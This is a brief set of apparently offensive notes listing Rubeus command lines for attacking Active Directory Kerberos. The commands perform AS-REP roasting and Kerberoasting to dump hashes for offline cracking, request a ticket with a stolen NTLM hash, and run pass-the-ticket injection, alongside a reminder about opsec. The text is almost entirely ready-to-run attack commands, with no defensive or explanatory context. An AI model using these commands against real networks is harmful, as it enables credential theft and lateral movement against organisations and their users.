Review the opsec notes before compiling the program in visual studio.
chek for users in the current domain:
- Rubeus.exe asreproast /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>
-
Rubeus.exe kerberoast /outfile:<output_TGSs_file>
-
Rubeus.exe kerberoast /outfile:hashes.txt [/spn:"SID-VALUE"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."]
- .\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
- Rubeus.exe ptt /ticket:<ticket_kirbi_file>